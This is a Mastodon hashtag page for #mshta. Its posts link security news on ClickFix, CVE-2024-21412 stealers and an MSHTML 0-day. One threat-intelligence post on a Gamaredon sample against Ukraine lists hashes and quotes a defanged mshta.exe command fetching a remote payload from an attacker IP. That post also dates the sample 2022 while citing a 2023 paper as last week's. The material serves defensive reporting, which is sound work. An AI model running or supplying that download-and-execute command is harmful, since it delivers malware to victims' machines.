KrebsOnSecurity RSS<p>ClickFix: How to Infect Your PC in Three Easy Steps</p><p><a href="https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/03/cl</span><span class="invisible">ickfix-how-to-infect-your-pc-in-three-easy-steps/</span></a></p><p> <a href="https://burn.capital/tags/U" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>U</span></a>.S.DepartmentofHealthandHumanServices <a href="https://burn.capital/tags/MicrosoftWindows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>MicrosoftWindows</span></a> <a href="https://burn.capital/tags/MicrosoftOffice" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>MicrosoftOffice</span></a> <a href="https://burn.capital/tags/GoogleChrome" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>GoogleChrome</span></a> <a href="https://burn.capital/tags/booking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>booking</span></a>.com <a href="https://burn.capital/tags/ArcticWolf" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ArcticWolf</span></a> <a href="https://burn.capital/tags/proofpoint" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>proofpoint</span></a> <a href="https://burn.capital/tags/mshta" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>mshta</span></a>.exe <a href="https://burn.capital/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://burn.capital/tags/Facebook" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Facebook</span></a> <a href="https://burn.capital/tags/Other" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Other</span></a></p>
Recent searches
No recent searches
Search options
Only available when logged in.
fosstodon.org is one of the many independent Mastodon servers you can use to participate in the fediverse.
Fosstodon is an invite only Mastodon instance that is open to those who are interested in technology; particularly free & open source software.
If you wish to join, contact us for an invite.
Administered by:
Server stats:
9.8Kactive users
fosstodon.org: About · Status · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.3.7
#mshta
0 posts · 0 participants · 0 posts today
ITSEC News<p>ClickFix: How to Infect Your PC in Three Easy Steps - A clever malware deployment scheme first spotted in targeted attacks last year has... <a href="https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/03/cl</span><span class="invisible">ickfix-how-to-infect-your-pc-in-three-easy-steps/</span></a> <a href="https://schleuss.online/tags/u" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>u</span></a>.s.departmentofhealthandhumanservices <a href="https://schleuss.online/tags/microsoftwindows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>microsoftwindows</span></a> <a href="https://schleuss.online/tags/microsoftoffice" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>microsoftoffice</span></a> <a href="https://schleuss.online/tags/googlechrome" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>googlechrome</span></a> <a href="https://schleuss.online/tags/booking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>booking</span></a>.com <a href="https://schleuss.online/tags/arcticwolf" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>arcticwolf</span></a> <a href="https://schleuss.online/tags/proofpoint" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>proofpoint</span></a> <a href="https://schleuss.online/tags/mshta" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>mshta</span></a>.exe <a href="https://schleuss.online/tags/clickfix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>clickfix</span></a> <a href="https://schleuss.online/tags/facebook" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>facebook</span></a> <a href="https://schleuss.online/tags/other" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>other</span></a></p>
Pyrzout :vm:<p>ClickFix: How to Infect Your PC in Three Easy Steps <a href="https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/03/cl</span><span class="invisible">ickfix-how-to-infect-your-pc-in-three-easy-steps/</span></a> <a href="https://social.skynetcloud.site/tags/U" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>U</span></a>.S.DepartmentofHealthandHumanServices <a href="https://social.skynetcloud.site/tags/MicrosoftWindows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>MicrosoftWindows</span></a> <a href="https://social.skynetcloud.site/tags/MicrosoftOffice" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>MicrosoftOffice</span></a> <a href="https://social.skynetcloud.site/tags/GoogleChrome" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>GoogleChrome</span></a> <a href="https://social.skynetcloud.site/tags/booking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>booking</span></a>.com <a href="https://social.skynetcloud.site/tags/ArcticWolf" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ArcticWolf</span></a> <a href="https://social.skynetcloud.site/tags/proofpoint" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>proofpoint</span></a> <a href="https://social.skynetcloud.site/tags/mshta" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>mshta</span></a>.exe <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Facebook" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Facebook</span></a> <a href="https://social.skynetcloud.site/tags/Other" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Other</span></a></p>
卡拉今天看了什麼<p>網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome</p><blockquote><a href="https://www.ithome.com.tw/news/164159" rel="nofollow noopener noreferrer" target="_blank">Link</a></blockquote>📌<span> Summary:<br>微軟在今年2月例行更新中修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客卻利用這項漏洞來散布多種竊資軟體,攻擊範圍涵蓋北美、西班牙和泰國。資安業者Fortinet在分析中發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並在受害電腦下載LNK檔案,誘使受害者執行該檔案,從而推進攻擊。研究人員看到駭客使用兩種不同程式碼注入工具來繞過防禦,最終在受害電腦植入竊資軟體。<br><br></span>🎯<span> Key Points:<br>1. 微軟在今年2月修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客利用它散布竊資軟體。<br>2. 資安業者Fortinet發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並誘使受害者執行以推進攻擊。<br>3. 研究人員看到駭客使用兩種程式碼注入工具,最終在受害電腦植入竊資軟體。<br>4. Fortinet發現,駭客利用Steam社群網站作為Dead Drop Resolver來埋藏C2來源。<br><br></span>🔖<span> Keywords:<br></span><a href="https://social.mikala.one/tags/CVE-2024-21412" rel="nofollow noopener noreferrer" target="_blank">#CVE-2024-21412</a><span> <br></span><a href="https://social.mikala.one/tags/Fortinet" rel="nofollow noopener noreferrer" target="_blank">#Fortinet</a><span> <br></span><a href="https://social.mikala.one/tags/Water" rel="nofollow noopener noreferrer" target="_blank">#Water</a><span> Hydra <br></span><a href="https://social.mikala.one/tags/Lumma" rel="nofollow noopener noreferrer" target="_blank">#Lumma</a><span> Stealer <br></span><a href="https://social.mikala.one/tags/Meduza" rel="nofollow noopener noreferrer" target="_blank">#Meduza</a><span> Stealer <br></span><a href="https://social.mikala.one/tags/ACR" rel="nofollow noopener noreferrer" target="_blank">#ACR</a><span> Stealer <br></span><a href="https://social.mikala.one/tags/PowerShell" rel="nofollow noopener noreferrer" target="_blank">#PowerShell</a><span> <br></span><a href="https://social.mikala.one/tags/HTA指令碼" rel="nofollow noopener noreferrer" target="_blank">#HTA指令碼</a><span> <br></span><a href="https://social.mikala.one/tags/Edge主程式圖示" rel="nofollow noopener noreferrer" target="_blank">#Edge主程式圖示</a><span> <br></span><a href="https://social.mikala.one/tags/LNK檔案" rel="nofollow noopener noreferrer" target="_blank">#LNK檔案</a><span> <br></span><a href="https://social.mikala.one/tags/forfiles" rel="nofollow noopener noreferrer" target="_blank">#forfiles</a><span> <br></span><a href="https://social.mikala.one/tags/mshta" rel="nofollow noopener noreferrer" target="_blank">#mshta</a><span> <br></span><a href="https://social.mikala.one/tags/Imghippo" rel="nofollow noopener noreferrer" target="_blank">#Imghippo</a><span> <br></span><a href="https://social.mikala.one/tags/GdipBitmapGetPixel" rel="nofollow noopener noreferrer" target="_blank">#GdipBitmapGetPixel</a><span> <br></span><a href="https://social.mikala.one/tags/HijackLoader" rel="nofollow noopener noreferrer" target="_blank">#HijackLoader</a><span> <br></span><a href="https://social.mikala.one/tags/Steam社群網站" rel="nofollow noopener noreferrer" target="_blank">#Steam社群網站</a><span> <br></span><a href="https://social.mikala.one/tags/Dead" rel="nofollow noopener noreferrer" target="_blank">#Dead</a><span> Drop Resolver <br></span><a href="https://social.mikala.one/tags/Docker" rel="nofollow noopener noreferrer" target="_blank">#Docker</a><span> <br></span><a href="https://social.mikala.one/tags/AuthZ" rel="nofollow noopener noreferrer" target="_blank">#AuthZ</a><span> <br></span><a href="https://social.mikala.one/tags/OpenAI" rel="nofollow noopener noreferrer" target="_blank">#OpenAI</a><span> <br></span><a href="https://social.mikala.one/tags/GPT-4o" rel="nofollow noopener noreferrer" target="_blank">#GPT-4o</a><span> mini<br></span><a href="https://social.mikala.one/tags/Meta" rel="nofollow noopener noreferrer" target="_blank">#Meta</a> Llama 3<p></p>
Pyrzout :vm:<p>0-Day en Windows MSHTML utilizado en ataques de malware <a href="https://blog.elhacker.net/2024/07/0-day-en-windows-mshtml-malware.html" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">blog.elhacker.net/2024/07/0-da</span><span class="invisible">y-en-windows-mshtml-malware.html</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://social.skynetcloud.site/tags/MSHTML" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>MSHTML</span></a> #0-day <a href="https://social.skynetcloud.site/tags/MSHTA" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>MSHTA</span></a></p>
Dmitry Bestuzhev<p>A very fresh <a href="https://infosec.exchange/tags/Gamaredon" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Gamaredon</span></a> TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of <a href="https://infosec.exchange/tags/Ukraine" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Ukraine</span></a>: </p><p>Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15</p><p>Attachment:<br>d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar</p><p>Extracted malicious LNK:<br>600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk<br>dropping a next stage <a href="https://infosec.exchange/tags/vbscript" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>vbscript</span></a> via <a href="https://infosec.exchange/tags/mshta" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>mshta</span></a></p><p>%windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu</p><p>284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu</p><p>Once deobfuscated it leads to a <a href="https://infosec.exchange/tags/Telegram" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Telegram</span></a> channel providing with the next state IP: <br>b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated</p><p>We have a full paper of this Telegram multi-staging technique published last week here: <a href="https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">blogs.blackberry.com/en/2023/0</span><span class="invisible">1/gamaredon-abuses-telegram-to-target-ukrainian-organizations</span></a></p>
ExploreLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
LoginDrag & drop to upload